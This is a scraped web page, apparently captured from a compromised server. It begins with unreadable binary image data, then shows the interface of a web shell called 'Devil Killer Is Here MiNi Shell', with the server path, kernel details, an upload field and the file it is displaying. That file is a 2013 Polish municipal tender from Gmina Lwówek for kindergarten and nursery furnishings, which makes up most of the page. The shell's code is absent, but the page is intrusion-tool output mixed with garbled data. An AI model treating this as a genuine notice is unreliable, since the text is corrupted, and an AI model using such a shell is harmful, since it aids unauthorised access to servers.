JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130610/105883-N-2013.html

<p class="kh_header"><b>Lwówek: Dostawa wyposażenia dla przedszkola wraz z oddziałami żłobka w Lwówku
 - nr sprawy: RG.271.05.01.2013.ZJ</b><br>
<b>Numer ogłoszenia: 105883 - 2013; data zamieszczenia: 10.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lwówek , ul. Ratuszowa 2, 64-310 Lwówek, woj. wielkopolskie, tel. 061 4414024, faks 061 4414212.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lwowek.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyposażenia dla przedszkola wraz z oddziałami żłobka w Lwówku
 - nr sprawy: RG.271.05.01.2013.ZJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa wyposażenia do nowego przedszkola wraz z oddziałami żłobka w Lwówku, ul. Świtalskiego.                                                                                                                                                                     
2. Przedmiot zamówienia obejmuje dostawę, transport  i montaż w miejscu wbudowania: 
1) standardowych mebli - wyposażenia przedszkola, w tym meble biurowe dla administracji i personelu obsługi,
2) standardowych mebli - wyposażenia żłobka,  
3) niestandardowych mebli - wykonanych na indywidualne zamówienie,
4) wyposażenia w sprzęt komputerowy i pakiety oprogramowania,
5) wyposażenia w osprzęt higieniczno - sanitarny,
6) zabawek dla na wyposażenia żłobka,
7) sprzętu i wyposażenia do utrzymania zewnętrznego obejścia budynku przedszkola,
8) Szczegółowe wykazy wyposażenia dla poszczególnych pomieszczeń przedszkola i żłobka wymieniono w załącznikach;  - wycena ofertowa nr 8, nr 9, nr 10, nr 11, nr 12  do niniejszej siwz.

3. Zakres przedmiotu dostawy i odpowiedzialności zobowiązuje Wykonawcę także do:
1) dowozu (dostarczenia) przedmiotu zamówienia do Przedszkola wraz z oddziałami żłobka w Lwówku, ul. Świtalskiego nr , 64-310 Lwówek, rozpakowania dostarczonych mebli, urządzeń i sprzętu oraz wniesienia, (podłączenie do instalacji wodnej, kanalizacyjnej, elektrycznej w przypadku takiej potrzeby), ustawienia i zamontowania w poszczególnych pomieszczeniach, zgodnie ze szczegółowym wykazem wyposażenia wymienionego w załącznikach jw., oraz wskazówkami przedstawiciela Zamawiającego - przyszłego użytkownika (Wykonawca w cenie oferty musi uwzględnić koszt transportu i rozładunku, usunięcia i utylizacji odpadów i opakowań powstałych przy realizacji zamówienia, a dla wyposażenia tego wymagającego również montażu i posprzątania wszystkich pomieszczeń tego wymagających, oaz zużycia mediów niezbędnych do realizacji zamówienia),     
2) dokonanie szczegółowych pomiarów z natury mebli i wyposażenia wspólnie z przedstawicielami Zamawiającego - użytkownika przed rozpoczęciem realizacji zamówienia z dostaw na indywidualne wyposażenie, w szczególności mebli wbudowanych oraz rolet okiennych,
3) zamontowanie, podłączenie i uruchomienie urządzeń oraz sprzętu (sprzęt elektroniczny)  wraz z pierwszym napełnieniem wszystkich urządzeń zamontowanych w pomieszczeniach sanitarnych i administracyjnych,
4) przekazanie Zamawiającemu wystawionego przez Wykonawcę dokumentu gwarancji jakości na dostarczone wyposażenie,
5) przekazanie Zamawiającemu instrukcji dostarczanego wyposażenia oraz kluczy do dostarczonych wyrobów zaopatrzonych w zamknięcia,
6) dostarczenie dokumentów potwierdzających, że pomoce dydaktyczne oraz wyposażenie posiadają niezbędne certyfikaty i atesty spełniające wymagania norm oraz są dostosowane do wymagań ergonomii, o których mowa w rozporządzeniu Ministra Edukacji Narodowej i Sportu z dn 31.12.2002r. w sprawie bezpieczeństwa i higieny w publicznych i niepublicznych szkołach i placówkach (Dz.U. z 2003r. Nr 6, poz. 69 z późn. zm.) oraz innych obowiązujących przepisów i norm w tej sprawie,
7) dostarczenie dokumentów poświadczających, że wyroby które będą dostarczane jako wyposażenie nie wydzielają substancji chemicznych o stężeniu i natężeniu przekraczającym wartości dopuszczalne wymienione w zarządzeniu Ministra Zdrowia i Opieki Społecznej z dn. 12.03.1996r. w sprawie dopuszczalnych stężeń i natężeń czynników szkodliwych dla zdrowia, wydzielanych przez materiały budowlane, urządzenia i elementy wyposażenia w pomieszczeniach przeznaczonych na pobyt ludzi (M.P. z 1996r. nr 19, poz. 231)
8) odpowiedzialność za wszelkie szkody i uszkodzenia powstałe w czasie transportu, wnoszenia i ustawiania (montażu) przedmiotu zamówienia, 
9) naprawa wszelkich uszkodzeń dokonanych w budynku przedszkola wraz z oddziałami żłobka w Lwówku podczas wykonywania niniejszego zamówienia.
                                                                                                                               
4. Odniesienie do art. 29 ustawy Pzp.                                                                                                              
1) W szczegółowych wykazach wyposażenia poszczególnych pomieszczeń Przedszkola wraz z oddziałami żłobka w Lwówku wymienionych w załącznikach - wycena ofertowa nr 8, nr 9, nr 10, nr 11, nr 12  do niniejszej siwz,  Zamawiający dla pełnego i jasnego przedstawienia Wykonawcom przedmiotu zamówienia jak i jego parametrów technicznych zastosował opis z podaniem producenta i znaku handlowego. 
Podane nazwy producenta jak i znaki handlowe należy traktować jako przykładowe, ze względu na zasady ustawy Prawo zamówień publicznych art. 29, Zamawiający dopuszcza dostawę wyrobów równoważnych z zachowaniem odpowiednich, równoważnych, tj. nie gorszych parametrów technicznych niż wskazane.
2) Wykonawca, który powołuje się na rozwiązania równoważne opisywane przez Zamawiającego, 
jest zobowiązany wykazać, że oferowane przez niego wyroby spełniają wymagania określone przez Zamawiającego,
3) W przypadkach, gdy w załącznikach - wycena ofertowa nr 8, nr 9, nr 10, nr 11, nr 12  do niniejszej siwz, wskazana została nazwa handlowa, lub znak towarowy wyrobu, to charakteryzujące tak opisany wyrób parametry i cechy techniczne stanowią warunek równoważności dla wyrobów zamiennych.
5. Pominięcie jakiejkolwiek pozycji przy wycenie i nie ujęcie jej w cenie ofertowej, nie może stanowić podstawy żądania dodatkowego wynagrodzenia z powyższego tytułu, a wyroby wymienione w tej pozycji będą podlegały dostarczeniu i zamontowaniu w ramach oferowanej ceny ofertowej.
 
6. Zamawiający zastrzega sobie prawo zmniejszenia zakresu dostawy i akceptacji bądź rezygnacji z elementów stanowiących zakres przedmiotu zamówienia (przedmiotu dostawy) do wysokości środków zabezpieczonych na to zadanie w budżecie gminy Lwówek na 2013r. (jeżeli zajdzie taka potrzeba).


7. Wymagania ogólne stawiane Wykonawcy:                                                                                                          1) Wykonawca jest odpowiedzialny za jakość  i zgodność z warunkami techniczno - jakościowymi opisanymi dla przedmiotu zamówienia,  wymienionymi w załącznikach - wycena ofertowa nr 8, nr 9, nr 10, nr 11, nr 12  do niniejszej siwz,  z zastosowaniem materiałów i urządzeń, które spełniają wymagania wynikające z polskich norm przenoszących normy europejskie, oraz posiadają atesty higieniczne, 
2) Wymagana jest należyta staranność przy realizacji zobowiązań umowy.                                                3) Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez ustanowionych przedstawicieli Zamawiającego z ustanowionym przedstawicielem Wykonawcy z określeniem przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia.                                                                                                                4) Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia na terenie budynku Przedszkola wraz z oddziałami żłobka w Lwówku i w jego obejściu.   
5) przedmiot zamówienia (dostawy) należy wykonać zgodnie z zasadami współczesnej wiedzy technicznej przy zabudowie indywidualnej, przy przestrzeganiu Polskich Norm, polskich aprobat technicznych i polskich specyfikacji technicznych oraz przepisów  bhp i p.poż.,
6) wszystkie materiały i urządzenia użyte do wykonania przedmiotowego zamówienia oraz ich parametry jakościowo techniczne muszą odpowiadać parametrom wytyczonym przez Wspólnotę (Unię Europejską), muszą posiadać atesty lub certyfikaty akceptowalne przez Unię i muszą pochodzić z Unii,  bądź z jednego z krajów stowarzyszonych w ramach Unii 
7) wykonawca przystępujący do postępowania jest zobowiązany do zaakceptowania projektu umowy przez jego podpisanie i parafowanie każdej ze stron.
8. Wymagania techniczne odnoszące się do przedmiotu zamówienia:       
1) dla mebli w zabudowie indywidualnej;
- meble należy wykonać z płyty wiórowej laminowanej o grubości 18 mm,
- krawędzie mebli oklejone okleiną ABS o grubości min. 1 mm,
- blaty stanowisk biurowych wykonane z płyty laminowanej o grubości 36 mm oklejone okleiną ABS o   
  grubości 2 mm,
- w aneksach kuchennych blaty HPL grubości 38 mm,
- zastosować systemy szuflad wyposażonych w prowadnice łożyskowe z samodociągiem, 
- w częściach biurowych szuflady typu Metalbox z burtami metalowymi (lub równoważne),
- w elementach zamykanych zawiasy metalowe z samodociągiem.
- meble wyposażyć w niezbędne uchwyty stalowe bądź aluminiowe.
2) Szatnie dla dzieci przedszkolnych - moduły szatniowe na stelażach stalowych mocowanych na stałe do ścian, bez przednich nóg z półką podwieszaną na buty, elementy umożliwiające łatwą konserwację podłóg, w miejscach występowania grzejników c.o. moduły szatniowe zdystansowane od ścian.
3) Szafy biurowe na akta oraz szafy gospodarcze wyposażone w systemy drzwi przesuwnych w okuciach stalowych bądź aluminiowych, grubość płyty w drzwiach przesuwnych 10 mm, szafy samodzielne z podłogą na cokole 100 mm, szafy muszą posiadać boki i górną płytę wieńczącą, oraz bezwzględnie z tyłem z płyty HDF. Półki mocowane do przegród za pomocą złączy mimośrodowych (wykluczone mocowania na wspornikach z tworzywa sztucznego), półki dodatkowo wzmocnione poprzez połączenie z płytą tylną.
4) Lustra bez ram do przyklejenia na ścianę jakościowo winny być odporne na podwyższoną wilgotność, miejsca montażu luster wskaże przedstawiciel Zamawiającego w osobie przyszłego użytkownika, 
5) W opisie przedmiotu zamówienia w miejscach gdzie nie wskazano pożądanego koloru płyt meblowych wybór koloru będzie uzgodniony przez upoważnionego przedstawiciela Zamawiającego - przyszłego użytkownika z wzornika przedstawionego przez wyłonionego Wykonawcę,
 6) Zamieszczone w szczegółowych wykazach wyposażenia (w załącznikach - wycena ofertowa nr 8, nr 9, nr 10, nr 11, nr 12  do niniejszej siwz), wizualizacje niektórych pozycji meblowych mogą odbiegać od wymagań konstrukcyjnych, są one jedynie wzorami według których należy te pozycje wykonać i przygotować wycenę ofertową.
 
9. Wymagania organizacyjne:
1) Zamawiający dopuszcza realizację przedmiotu zamówienia etapami, na podstawie harmonogramu rzeczowo - finansowego (określającego także terminy dostaw) przygotowanego przez Wykonawcę i zaakceptowanego przed podpisaniem umowy przez Zamawiającego (harmonogram będzie stanowił załącznik do umowy z Wykonawcą),
2) W przypadku dostaw etapowych, Wykonawca ma obowiązek zawiadomić upoważnionego przedstawiciela Zamawiającego i przyszłego użytkownika na co najmniej na 2 dni przed planowaną datą dostawy i montażu.  

10. Wymagania dotyczące gwarancji:
1) Wykonawca udzieli co najmniej 24 miesięcznej gwarancji jakości na dostarczone wyposażenie od daty podpisania pozytywnego końcowego protokółu odbioru przedmiotu zamówienia i przekazania go Zamawiającemu,
2) w okresie gwarancji Wykonawca zobowiązuje się do bezpłatnego wykonania wszystkich ewentualnych napraw, 
3) W przypadku, kiedy konieczne będzie natychmiastowe wykonanie napraw, a Wykonawca po udokumentowanym zawiadomieniu  nie przystąpi do napraw (sytuacja zagrożenia lub możliwości powstania strat materialnych), Zamawiający wykona naprawy na koszt Wykonawcy i powiadomi go niezwłocznie o tym fakcie.
4) Wykonawca przed dokonaniem odbioru końcowego przekaże dokumenty gwarancyjne producentów wbudowanych przez siebie urządzeń technicznych i zainstalowanego sprzętu..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego. 
1) Zamawiający oświadcza, iż w przypadku posiadania środków zabezpieczonych w budżecie Gminy Lwówek na 2013r. na to zadanie,  oraz kiedy wartość tych środków będzie wyższa, a niżeli wartość wybranej najkorzystniejszej oferty - przewiduje możliwość udzielenia zamówień uzupełniających - dodatkowych.                                                                                                                                                                                                                                             
2) Jeżeli w trakcie realizacji umowy i wykonywania dostaw wystąpią zmiany rozwiązań technicznych równorzędne lub polepszające funkcjonalnie obiekt  Przedszkola wraz z oddziałami żłobka w Lwówku,                                                                                                                                                        lub zamówienie uzupełniające będzie polegało na powtórzeniu tego samego rodzaju zamówień,                                                                                                                                  lub wystąpią inne dostawy niezawinione przez Wykonawcę, których nie udało się przewidzieć na etapie planowania i projektowania przedmiotowego zamówienia  wymagające dodatkowego wynagrodzenia.   
3) Wykonawca wykona zamówienia uzupełniające, lub dodatkowe jedynie na wyraźne polecenie Zamawiającego, na podstawie oddzielnego dodatkowego zamówienia - dodatkowej umowy realizowanej zgodnie z art. 67 ust. 1 pkt. 6) lub zgodnie z art. 67 ust. 1 pkt. 5) ustawy Pzp, dla którego zostanie sporządzona przez Wykonawcę dodatkowa wycena (w oparciu złożoną ofertę, jeżeli zamówienie będzie polegało na powtórzeniu tego samego rodzaju zamówień, zgodnie z cenami jednostkowymi czynników cenotwórczych do zamówienia podstawowego, jednakowych jak przyjęte w złożonej ofercie przez Wykonawcę) i ilościami  przewidzianymi do dokonania dostaw na podstawie sporządzonego protokółu konieczności, dla wykonania zamówienia dodatkowego bądź dla wykonania zamówienia uzupełniającego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.00.00.00-2, 39.16.10.00-8, 39.13.00.00-2, 36.16.21.00-6, 39.16.20.00-5, 37.52.00.00-9, 30.23.60.00-2, 30.12.11.00-4, 39.22.43.00-1, 39.22.43.30-0, 39.22.11.10-1, 39.22.30.00-1, 39.24.11.10-7, 39.22.12.10-2, 33.14.16.20-2, 34.92.84.80-6, 42.96.83.00-2, 39.83.17.00-3, 39.22.43.10-4, 38.62.20.00-1, 16.31.11.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawijący w tym postępowaniu nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień, za spełnienie warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania Zamawiający uzna złożenie przez Wykonawcę oświadczenia z art. 22 ust 1 ustawy Pzp.   	Ocena spełnienia warunku udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej trzech zamówień o wartości nie mniejszej niż 50 000,00zł netto każde, na dostawę mebli i innego wyposażenia dla obiektów użyteczności publicznej oraz załączy dokumenty potwierdzające, że dostawy zostały wykonane lub są wykonywane należycie.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie wykazu złożonego wraz z ofertą przez Wykonawcę wraz z dokumentami potwierdzającymi, że te dostawy zostały wykonane lub są wykonywane należycie.
 	Ocena spełnienia warunku udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy PZP.
 	Ocena spełnienia warunku udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek spełnią wykonawcy, którzy: 
dołączą wykaz części zamówienia jakie zamierzają  zlecić podwykonawcom do wykonania wg zał. nr 6 do siwz.                     
 	Ocena spełnienia warunku udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek spełnią wykonawcy, którzy :                                                                                                   
-  posiadają środki finansowe na wykonanie przedmiotowego zamówienia, lub zdolność kredytową na 
   kwotę nie mniejszą niż 150.000,00zł,  
-  posiadają opłaconą polisę, potwierdzającą, że są ubezpieczeni od odpowiedzialności cywilnej w 
   zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie 
   mniejszą niż 200.000,00zł.                                                                                                                                     
 	Ocena spełnienia warunku udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

